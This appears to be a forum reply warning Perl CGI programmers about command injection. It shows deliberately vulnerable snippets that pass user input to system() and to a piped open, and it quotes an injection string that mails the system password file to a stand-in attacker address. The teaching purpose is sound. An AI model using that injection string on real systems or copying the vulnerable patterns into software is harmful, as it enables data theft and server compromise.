Do you have an example of this? I don't *think* I'm doing this.

The most brutal example of this and an injection attack hole I can think of would be something like:

 | 
 | handwaving of HTML here...
 |
<p>
Type in the address you want to look up
<input type="text" name="host_to_search_rq"> 
</p>
 |
[download]

#
# Stuff left out.... 
my $hostname=$cgi->param('host_to_search_rq'); 
system("nslookup $hostname"); #BAD!!! BAD!!! BAD!!!
#
#
[download]

First off it is concievable that the malicious hax0r has partially compromised your system already and has a script of their own named "nslookup" sitting in your path so you want to only invoke shell commands within your CGI using fully qualified pathnames to commands. That still doesn't fully get you off the hook, but it is a good start.

Secondly, having not checked the contents of $hostname and blindly executing the query leaves you open to an injection attack. A malicious induhvidual could enter the string ";cat /etc/password | /usr/ucb/Mail hax0rRus@hax0r.org" which then sends them the contents of your /etc/password file for a future brute force attack.

Another Dumb Idea® that I've actually seen folks do:

|
|   Much handwaving again...
|
if (! $cgi->param('command_rq') ) {
   
   print $cgi->p("input a command: ",
                $cgi->text(-name=>"command_rq") );
} else {

     # OH MY GOD!!! DON'T DO THIS!
     open PIPE,$cgi->parma('command_rq') . "|" 
            or die $!;
     my @results = <PIPE>
     print $cgi->pre(@results);

}
[download]

Talk about asking for trouble!

Just a few ways to crash and burn in the world of CGI....

Just remember, the web is not the "village" it used to be any more. It has grown up into a very large urban area with hookers and muggers on quite a few of the street corners. You would use caution if you had to walk through someplace like that in the Real World™ and you certainly wouldn't leave your doors unlocked there or put valuables out on the front porch. If you can think of a way to break your own security (and your should try and think of ways) someone else can too.